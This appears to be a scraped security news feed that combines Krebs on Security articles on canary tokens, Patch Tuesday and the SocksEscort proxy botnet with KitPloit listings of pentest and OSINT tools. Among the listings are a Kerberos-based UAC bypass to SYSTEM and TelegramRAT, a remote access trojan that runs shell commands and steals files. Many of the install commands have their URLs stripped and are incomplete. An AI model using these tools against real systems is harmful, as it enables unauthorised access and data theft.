-a “sensitive command” token, to alert when a suspicious Windows command is run.
-a Microsoft Excel/Word token, which alerts when a specific Excel or Word file is accessed.

Much like a “wet paint” sign often encourages people to touch a freshly painted surface anyway, attackers often can’t help themselves when they enter a foreign network and stumble upon what appear to be key digital assets, Meer says.

“If an attacker lands on your server and finds a key to your cloud environment, it’s really hard for them not to try it once,” Meer said. “Also, when these sorts of actors do land in a network, they have to orient themselves, and while doing that they are going to trip canaries.”

Meer says canary tokens are as likely to trip up attackers as they are “red teams,” security experts hired or employed by companies seeking to continuously probe their own computer systems and networks for security weaknesses.

“The concept and use of canary tokens has made me very hesitant to use credentials gained during an engagement, versus finding alternative means to an end goal,” wrote Shubham Shah, a penetration tester and co-founder of the security firm Assetnote. “If the aim is to increase the time taken for attackers, canary tokens work well.”

Thinkst makes money by selling Canary Tools, which are honeypots that emulate full blown systems like Windows servers or IBM mainframes. They deploy in minutes and include a personalized, private Canarytoken server.

“If you’ve got a sophisticated defense team, you can start putting these things in really interesting places,” Meer said. “Everyone says their stuff is simple, but we obsess over it. It’s really got to be so simple that people can’t mess it up. And if it works, it’s the best bang for your security buck you’re going to get.”

Further reading:

Dark Reading: Credential Canaries Create Minefield for Attackers
NCC Group: Extending a Thinkst Canary to Become an Interactive Honeypot
Cruise Automation’s experience deploying canary tokens

☐ ☆ ✇ KitPloit - PenTest Tools!

AD_Enumeration_Hunt - Collection Of PowerShell Scripts And Commands That Can Be Used For Active Directory (AD) Penetration Testing And Security Assessment

By: Zion3R — August 22nd 2023 at 12:30


Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.

The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper authorization and permission before using these scripts in any production environment.

Everyone is looking at what you are looking at; But can everyone see what he can see? You are the only difference between them… By Mevlânâ Celâleddîn-i Rûmî


  • Enumerate and gather information about AD domains, users, groups, and computers.
  • Check trust relationships between domains.
  • List all objects inside a specific Organizational Unit (OU).
  • Retrieve information about the currently logged-in user.
  • Perform various operations related to local users and groups.
  • Configure firewall rules and enable Remote Desktop (RDP).
  • Connect to remote machines using RDP.
  • Gather network and security information.
  • Check Windows Defender status and exclusions configured via GPO.
  • ...and more!


  1. Clone the repository or download the scripts as needed.
  2. Run the PowerShell script using the appropriate PowerShell environment.
  3. Follow the on-screen prompts to provide domain, username, and password when required.
  4. Enjoy exploring the AD Pentesting Toolkit and use the scripts responsibly!


The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.


This project is licensed under the MIT License. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.

Cyber Security Consultant

Alperen Ugurlu

☐ ☆ ✇ KitPloit - PenTest Tools!

Xsubfind3R - A CLI Utility To Find Domain'S Known Subdomains From Curated Passive Online Sources

By: Zion3R — August 19th 2023 at 12:30

xsubfind3r is a command-line interface (CLI) utility to find domain's known subdomains from curated passive online sources.


  • Fetches domains from curated passive sources to maximize results.

  • Supports stdin and stdout for easy integration into workflows.

  • Cross-Platform (Windows, Linux & macOS).


Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

  • ...or, with curl:

     curl -OL<version>/xsubfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xsubfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xsubfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v

go build ... the development Version

  • Clone the repository

     git clone 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, Github, Intelligence X and Shodan require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.3.0
- alienvault
- anubis
- bevigil
- chaos
- commoncrawl
- crtsh
- fullhunt
- github
- hackertarget
- intelx
- shodan
- urlscan
- wayback
- awA5nvpKU3N8ygkZ
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
- 0d9652ce-516c-4315-b589-9b241ee6dc24
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
- d4c85d34-e425-446e-d4ab-f5a3412acbe8


To display help message for xsubfind3r use the -h flag:

xsubfind3r -h

help message:

_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

xsubfind3r [OPTIONS]

-d, --domain string[] target domains
-l, --list string target domains' list file path

--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude

-t, --threads int number of threads (default: 50)

--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)


Issues and Pull Requests are welcome! Check out the contribution guidelines.


This utility is distributed under the MIT license.

☐ ☆ ✇ KitPloit - PenTest Tools!

Bryobio - NETWORK Pcap File Analysis

By: Zion3R — August 18th 2023 at 12:30

NETWORK Pcap File Analysis, It was developed to speed up the processes of SOC Analysts during analysis


OK Debian
OK Ubuntu


$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep


$ cd Bryobio
$ chmod +x

$ python3

☐ ☆ ✇ KitPloit - PenTest Tools!

Redeye - A Tool Intended To Help You Manage Your Data During A Pentest Operation

By: Zion3R — August 16th 2023 at 12:30

This project was built by pentesters for pentesters. Redeye is a tool intended to help you manage your data during a pentest operation in the most efficient and organized way.

The Developers

Daniel Arad - @dandan_arad && Elad Pticha - @elad_pt


The Server panel will display all added server and basic information about the server such as: owned user, open port and if has been pwned.

After entering the server, An edit panel will appear. We can add new users found on the server, Found vulnerabilities and add relevant attain and files.

Users panel contains all found users from all servers, The users are categorized by permission level and type. Those details can be chaned by hovering on the username.

Files panel will display all the files from the current pentest. A team member can upload and download those files.

Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.

PreReport panel will contain all the screenshots from the current pentest.

Graph panel will contain all of the Users and Servers and the relationship between them.

APIs allow users to effortlessly retrieve data by making simple API requests.

curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq



Pull from GitHub container registry.

git clone
cd Redeye
docker-compose up -d

Start/Stop the container

sudo docker-compose start/stop

Save/Load Redeye

docker save neo4j:4.4.9 > Redeye.tar
docker load < Redeye.tar

GitHub container registry:


git clone
cd Redeye
sudo apt install python3.8-venv
python3 -m venv RedeyeVirtualEnv
source RedeyeVirtualEnv/bin/activate
pip3 install -r requirements.txt
python3 RedDB/
python3 --safe


Redeye will listen on:
Default Credentials:

  • username: redeye
  • password: redeye

Neo4j will listen on:
Default Credentials:

  • username: neo4j
  • password: redeye


  • Yoav Danino for mental support and beta testing.


If you own any Code/File in Redeye that is not under MIT License please contact us at:

☐ ☆ ✇ KitPloit - PenTest Tools!

InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R — August 16th 2023 at 20:58

During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will be later analyzed to extract even more valuable information.

Infohound architecture


git clone
cd InfoHound/infohound
cd ..
docker-compose up -d

You must add API Keys inside file

Default modules

InfoHound has 2 different types of modules, those which retreives data and those which analyse it to extract more relevant information.

 Retrievval modules

Name Description
Get Whois Info Get relevant information from Whois register.
Get DNS Records This task queries the DNS.
Get Subdomains This task uses Alienvault OTX API,, and HackerTarget as data sources to discover cached subdomains.
Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
Find Email It looks for emails using queries to Google and Bing.
Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.


Name Description
Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules, you just need to add your script inside infohoudn/tool/custom_modules. One custome module has been added as an example which uses Holehe tool to check if the emails previously are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by

☐ ☆ ✇ KitPloit - PenTest Tools!

Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

By: Zion3R — August 11th 2023 at 12:30

xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages i.e systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


  • Recursively crawls webpages for URLs.
  • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
  • Parses URLs from robots.txt.
  • Parses URLs from sitemaps.
  • Renders pages (including Single Page Applications such as Angular and React).
  • Cross-Platform (Windows, Linux & macOS)


Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

  • ...or, with curl:

     curl -OL<version>/xcrawl3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xcrawl3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xcrawl3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v

go build ... the development Version

  • Clone the repository

     git clone 
  • Build the utility

     cd xcrawl3r/cmd/xcrawl3r && \
    go build .
  • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.


To display help message for xcrawl3r use the -h flag:

xcrawl3r -h

help message:

                             _ _____      
__ _____ _ __ __ ___ _| |___ / _ __
\ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
> < (__| | | (_| |\ V V /| |___) | |
/_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

A CLI utility to recursively crawl webpages.

xcrawl3r [OPTIONS]

-d, --domain string domain to match URLs
--include-subdomains bool match subdomains' URLs
-s, --seeds string seed URLs file (use `-` to get from stdin)
-u, --url string URL to crawl

--depth int maximum depth to crawl (default 3)
TIP: set it to `0` for infinite recursion
--headless bool If true the browser will be displayed while crawling.
-H, --headers string[] custom header to include in requests
e.g. -H 'Referer:'
TIP: use multiple flag to set multiple headers
--proxy string[] Proxy URL (e.g:
TIP: use multiple flag to set multiple proxies
--render bool utilize a headless chrome instance to render pages
--timeout int time to wait for request in seconds (default: 10)
--user-agent string User Agent to use (default: web)
TIP: use `web` for a random web user-agent,
`mobile` for a random mobile user-agent,
or you can set your specific user-agent.

-c, --concurrency int number of concurrent fetchers to use (default 10)
--delay int delay between each request in seconds
--max-random-delay int maximux extra randomized delay added to `--dalay` (default: 1s)
-p, --parallelism int number of concurrent URLs to process (default: 10)

--debug bool enable debug mode (default: false)
-m, --monochrome bool coloring: no colored output mode
-o, --output string output file to write found URLs
-v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)


Issues and Pull Requests are welcome! Check out the contribution guidelines.


This utility is distributed under the MIT license.


☐ ☆ ✇ KitPloit - PenTest Tools!

Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

By: Zion3R — August 9th 2023 at 12:30

xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.



Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

  • ...or, with curl:

     curl -OL<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v

go build ... the development Version

  • Clone the repository

     git clone 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.2.0
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
- awA5nvpKU3N8ygkZ
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
- d4c85d34-e425-446e-d4ab-f5a3412acbe8


To display help message for xurlfind3r use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

xurlfind3r [OPTIONS]

-d, --domain string (sub)domain to match URLs

--include-subdomains bool match subdomain's URLs

-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots

-f, --filter string regex to filter URLs
-m, --match string regex to match URLs

--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)



xurlfind3r -d --include-subdomains

Filter Regex

# filter images
xurlfind3r -d --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

Match Regex

# match js URLs
xurlfind3r -d --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'


Issues and Pull Requests are welcome! Check out the contribution guidelines.


This utility is distributed under the MIT license.

☐ ☆ ✇ Krebs on Security

Microsoft Patch Tuesday, August 2023 Edition

By: BrianKrebs — August 9th 2023 at 02:22

Microsoft Corp. today issued software updates to plug more than 70 security holes in its Windows operating systems and related products, including multiple zero-day vulnerabilities currently being exploited in the wild.

Six of the flaws fixed today earned Microsoft’s “critical” rating, meaning malware or miscreants could use them to install software on a vulnerable Windows system without any help from users.

Last month, Microsoft acknowledged a series of zero-day vulnerabilities in a variety of Microsoft products that were discovered and exploited in-the-wild attacks. They were assigned a single placeholder designation of CVE-2023-36884.

Satnam Narang, senior staff research engineer at Tenable, said the August patch batch addresses CVE-2023-36884, which involves bypassing the Windows Search Security feature.

“Microsoft also released ADV230003, a defense-in-depth update designed to stop the attack chain associated that leads to the exploitation of this CVE,” Narang said. “Given that this has already been successfully exploited in the wild as a zero-day, organizations should prioritize patching this vulnerability and applying the defense-in-depth update as soon as possible.”

Redmond patched another flaw that is already seeing active attacks — CVE-2023-38180 — a weakness in .NET and Visual Studio that leads to a denial-of-service condition on vulnerable servers.

“Although the attacker would need to be on the same network as the target system, this vulnerability does not require the attacker to have acquired user privileges,” on the target system, wrote Nikolas Cemerikic, cyber security engineer at Immersive Labs.

Narang said the software giant also patched six vulnerabilities in Microsoft Exchange Server, including CVE-2023-21709, an elevation of privilege flaw that was assigned a CVSSv3 (threat) score of 9.8 out of a possible 10, even though Microsoft rates it as an important flaw, not critical.

“An unauthenticated attacker could exploit this vulnerability by conducting a brute-force attack against valid user accounts,” Narang said. “Despite the high rating, the belief is that brute-force attacks won’t be successful against accounts with strong passwords. However, if weak passwords are in use, this would make brute-force attempts more successful. The remaining five vulnerabilities range from a spoofing flaw and multiple remote code execution bugs, though the most severe of the bunch also require credentials for a valid account.”

Experts at security firm Automox called attention to CVE-2023-36910, a remote code execution bug in the Microsoft Message Queuing service that can be exploited remotely and without privileges to execute code on vulnerable Windows 10, 11 and Server 2008-2022 systems. Microsoft says it considers this vulnerability “less likely” to be exploited, and Automox says while the message queuing service is not enabled by default in Windows and is less common today, any device with it enabled is at critical risk.

Separately, Adobe has issued a critical security update for Acrobat and Reader that resolves at least 30 security vulnerabilities in those products. Adobe said it is not aware of any exploits in the wild targeting these flaws. The company also issued security updates for Adobe Commerce and Adobe Dimension.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a fair chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

-SANS Internet Storm Center listing of each Microsoft vulnerability patched today, indexed by severity and affected component., which keeps tabs on any developing problems related to the availability or installation of these updates.

☐ ☆ ✇ KitPloit - PenTest Tools!

KRBUACBypass - UAC Bypass By Abusing Kerberos Tickets

By: Zion3R — August 2nd 2023 at 12:30

This POC is inspired by James Forshaw (@tiraniddo) shared at BlackHat USA 2022 titled “Taking Kerberos To The Next Level ” topic, he shared a Demo of abusing Kerberos tickets to achieve UAC bypass. By adding a KERB-AD-RESTRICTION-ENTRY to the service ticket, but filling in a fake MachineID, we can easily bypass UAC and gain SYSTEM privileges by accessing the SCM to create a system service. James Forshaw explained the rationale behind this in a blog post called "Bypassing UAC in the most Complex Way Possible!", which got me very interested. Although he didn't provide the full exploit code, I built a POC based on Rubeus. As a C# toolset for raw Kerberos interaction and ticket abuse, Rubeus provides an easy interface that allows us to easily initiate Kerberos requests and manipulate Kerberos tickets.

You can see related articles about KRBUACBypass in my blog "Revisiting a UAC Bypass By Abusing Kerberos Tickets", including the background principle and how it is implemented. As said in the article, this article was inspired by @tiraniddo's "Taking Kerberos To The Next Level" (I would not have done it without his sharing) and I just implemented it as a tool before I graduated from college.

Tgtdeleg Trick

We cannot manually generate a TGT as we do not have and do not have access to the current user's credentials. However, Benjamin Delpy (@gentilkiwi) in his Kekeo A trick (tgtdeleg) was added that allows you to abuse unconstrained delegation to obtain a local TGT with a session key.

Tgtdeleg abuses the Kerberos GSS-API to obtain available TGTs for the current user without obtaining elevated privileges on the host. This method uses the AcquireCredentialsHandle function to obtain the Kerberos security credentials handle for the current user, and calls the InitializeSecurityContext function for HOST/ using the ISC_REQ_DELEGATE flag and the target SPN to prepare the pseudo-delegation context to send to the domain controller. This causes the KRB_AP-REQ in the GSS-API output to include the KRB_CRED in the Authenticator Checksum. The service ticket's session key is then extracted from the local Kerberos cache and used to decrypt the KRB_CRED in the Authenticator to obtain a usable TGT. The Rubeus toolset also incorporates this technique. For details, please refer to “Rubeus – Now With More Kekeo”.

With this TGT, we can generate our own service ticket, and the feasible operation process is as follows:

  1. Use the Tgtdeleg trick to get the user's TGT.
  2. Use the TGT to request the KDC to generate a new service ticket for the local computer. Add a KERB-AD-RESTRICTION-ENTRY, but fill in a fake MachineID.
  3. Submit the service ticket into the cache.


Once you have a service ticket, you can use Kerberos authentication to access Service Control Manager (SCM) Named Pipes or TCP via HOST/HOSTNAME or RPC/HOSTNAME SPN. Note that SCM's Win32 API always uses Negotiate authentication. James Forshaw created a simple POC: SCMUACBypass.cpp, through the two APIs HOOK AcquireCredentialsHandle and InitializeSecurityContextW, the name of the authentication package called by SCM (pszPack age ) to Kerberos to enable the SCM to use Kerberos when authenticating locally.

Let’s see it in action

Now let's take a look at the running effect, as shown in the figure below. First request a ticket for the HOST service of the current server through the asktgs function, and then create a system service through krbscm to gain the SYSTEM privilege.

KRBUACBypass.exe asktgs
KRBUACBypass.exe krbscm

☐ ☆ ✇ KitPloit - PenTest Tools!

TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

By: Zion3R — July 31st 2023 at 12:30

Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions


1. git clone
2. Now Follow the instructions in HOW TO USE Section.


1. Go to Telegram and search for
2. Create Bot and get the API_TOKEN
3. Now search for and get the chat_id
4. Now Go to and go to line 16 and 17 and place API_TOKEN and chat_id there
5. Now run python For Windows and python3 For Linux
6. Now Go to the bot which u created and send command in message field


HELP MENU: Coded By Machine1337
CMD Commands | Execute cmd commands directly in bot
cd .. | Change the current directory
cd foldername | Change to current folder
download filename | Download File From Target
screenshot | Capture Screenshot
info | Get System Info
location | Get Target Location


1. Execute Shell Commands in bot directly.
2. download file from client.
3. Get Client System Information.
4. Get Client Location Information.
5. Capture Screenshot
6. More features will be added


Coded By: Machine1337

☐ ☆ ✇ KitPloit - PenTest Tools!

LFI-FINDER - Tool Focuses On Detecting Local File Inclusion (LFI) Vulnerabilities

By: Zion3R — July 30th 2023 at 12:30

Written by TMRSWRR

Version 1.0.0

Instagram: TMRSWRR

How to use

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.

This tool works with geckodriver, search url for LFI Vuln and when get an root text on the screen, it notifies you of the successful payload.


git clone
pip3 install -r requirements.txt
chmod -R 755


Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2023

☐ ☆ ✇ Krebs on Security

Who and What is Behind the Malware Proxy Service SocksEscort?

By: BrianKrebs — July 25th 2023 at 21:20

Researchers this month uncovered a two-year-old Linux-based remote access trojan dubbed AVrecon that enslaves Internet routers into botnet that bilks online advertisers and performs password-spraying attacks. Now new findings reveal that AVrecon is the malware engine behind a 12-year-old service called SocksEscort, which rents hacked residential and small business devices to cybercriminals looking to hide their true location online.

Image: Lumen’s Black Lotus Labs.

In a report released July 12, researchers at Lumen’s Black Lotus Labs called the AVrecon botnet “one of the largest botnets targeting small-office/home-office (SOHO) routers seen in recent history,” and a crime machine that has largely evaded public attention since first being spotted in mid-2021.

“The malware has been used to create residential proxy services to shroud malicious activity such as password spraying, web-traffic proxying and ad fraud,” the Lumen researchers wrote.

Malware-based anonymity networks are a major source of unwanted and malicious web traffic directed at online retailers, Internet service providers (ISPs), social networks, email providers and financial institutions. And a great many of these “proxy” networks are marketed primarily to cybercriminals seeking to anonymize their traffic by routing it through an infected PC, router or mobile device.

Proxy services can be used in a legitimate manner for several business purposes — such as price comparisons or sales intelligence — but they are massively abused for hiding cybercrime activity because they make it difficult to trace malicious traffic to its original source. Proxy services also let users appear to be getting online from nearly anywhere in the world, which is useful if you’re a cybercriminal who is trying to impersonate someone from a specific place., a startup that tracks proxy services, told KrebsOnSecurity that the Internet addresses Lumen tagged as the AVrecon botnet’s “Command and Control” (C2) servers all tie back to a long-running proxy service called SocksEscort.

SocksEscort[.]com, is what’s known as a “SOCKS Proxy” service. The SOCKS (or SOCKS5) protocol allows Internet users to channel their Web traffic through a proxy server, which then passes the information on to the intended destination. From a website’s perspective, the traffic of the proxy network customer appears to originate from a rented/malware-infected PC tied to a residential ISP customer, not from the proxy service customer.

The SocksEscort home page says its services are perfect for people involved in automated online activity that often results in IP addresses getting blocked or banned, such as Craigslist and dating scams, search engine results manipulation, and online surveys.

Spur tracks SocksEscort as a malware-based proxy offering, which means the machines doing the proxying of traffic for SocksEscort customers have been infected with malicious software that turns them into a traffic relay. Usually, these users have no idea their systems are compromised.

Spur says the SocksEscort proxy service requires customers to install a Windows based application in order to access a pool of more than 10,000 hacked devices worldwide.

“We created a fingerprint to identify the call-back infrastructure for SocksEscort proxies,” Spur co-founder Riley Kilmer said. “Looking at network telemetry, we were able to confirm that we saw victims talking back to it on various ports.”

According to Kilmer, AVrecon is the malware that gives SocksEscort its proxies.

“When Lumen released their report and IOCs [indicators of compromise], we queried our system for which proxy service call-back infrastructure overlapped with their IOCs,” Kilmer continued. “The second stage C2s they identified were the same as the IPs we labeled for SocksEscort.”

Lumen’s research team said the purpose of AVrecon appears to be stealing bandwidth – without impacting end-users – in order to create a residential proxy service to help launder malicious activity and avoid attracting the same level of attention from Tor-hidden services or commercially available VPN services.

“This class of cybercrime activity threat may evade detection because it is less likely than a crypto-miner to be noticed by the owner, and it is unlikely to warrant the volume of abuse complaints that internet-wide brute-forcing and DDoS-based botnets typically draw,” Lumen’s Black Lotus researchers wrote.

Preserving bandwidth for both customers and victims was a primary concern for SocksEscort in July 2022, when 911S5 — at the time the world’s largest known malware proxy network — got hacked and imploded just days after being exposed in a story here. Kilmer said after 911’s demise, SocksEscort closed its registration for several months to prevent an influx of new users from swamping the service.

Danny Adamitis, principal information security researcher at Lumen and co-author of the report on AVrecon, confirmed Kilmer’s findings, saying the C2 data matched up with what Spur was seeing for SocksEscort dating back to September 2022.

Adamitis said that on July 13 — the day after Lumen published research on AVrecon and started blocking any traffic to the malware’s control servers — the people responsible for maintaining the botnet reacted quickly to transition infected systems over to a new command and control infrastructure.

“They were clearly reacting and trying to maintain control over components of the botnet,” Adamitis said. “Probably, they wanted to keep that revenue stream going.”

